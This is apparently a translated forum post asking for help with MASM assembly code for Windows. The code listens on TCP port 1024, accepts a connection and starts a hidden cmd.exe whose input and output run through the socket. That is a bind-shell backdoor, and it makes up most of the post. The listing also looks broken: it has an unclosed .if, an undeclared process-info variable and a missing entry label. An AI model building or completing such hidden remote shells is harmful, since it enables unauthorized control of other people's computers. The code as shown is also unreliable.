"Just use pipe. MSDN has the complete source code."
If you use pipes, then the socket can only be a socket. Now I use WSASocket, in order to figure out the steering output of cmd...
Execute cmd after calling CreateProcess, and then assign the handle returned by accept() to hStdInput, hStdOutput, hStdError in the process additional information. In theory, this is the case, but cmd was executed when I wrote the code to compile, but it disappeared in a flash. I took a look at it with OD and found no errors after setting a single step. I hope to discuss it together. The complete code I wrote is as follows:
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include kernel32.inc
include wsock32.inc
include Ws2_32.inc
includelib user32.lib
includelib kernel32.lib
includelib wsock32.lib
includelib Ws2_32.lib
TCP_PORT equ 1024; constant definition
szCommand db'cmd.exe',0
hScoket SOCKET?
hScoketOther SOCKET?
szBuffer db MAX_PATH dup(?)
dwSize DWORD?
_ProcessMain proc
local @wsaData:WSADATA
local @hScoket:SOCKET
local @stAddr:sockaddr_in
local stStartUp:STARTUPINFO
invoke WSAStartup, 0202H, addr @wsaData; initialize WSAStartup library
mov @stAddr.sin_family,AF_INET; Set IP format
invoke htons, TCP_PORT; set the port
mov @stAddr.sin_port,ax; save
mov @stAddr.sin_addr,INADDR_ANY; set the IP address
invoke WSASocket,AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0; load socket
mov hScoket,eax; save the handle
invoke bind,hScoket,addr @stAddr,sizeof sockaddr_in; bind
.if eax == SOCKET_ERROR
mov eax,FALSE
invoke listen,hScoket,5; start listening, 5 connections are by default
invoke accept, hScoket, NULL, NULL; if there is a client connection, confirm immediately
mov hScoketOther,eax
invoke GetStartupInfo,addr stStartUp
mov ebx,hScoketOther
mov stStartUp.hStdInput, ebx; Assign values to the structure members of STARTUPINFO to make cmd turn to output. This value is the handle returned by accept()
mov stStartUp.hStdOutput,ebx
mov stStartUp.hStdError,ebx
mov stStartUp.wShowWindow,SW_HIDE
invoke CreateProcess,NULL,addr szCommand,NULL,NULL,\
NULL,NORMAL_PRIORITY_CLASS,NULL,NULL,addr stStartUp,addr stProcInfo; load the result and execute cmd
_ProcessMain endp
invoke _ProcessMain
invoke ExitProcess,NULL
end start |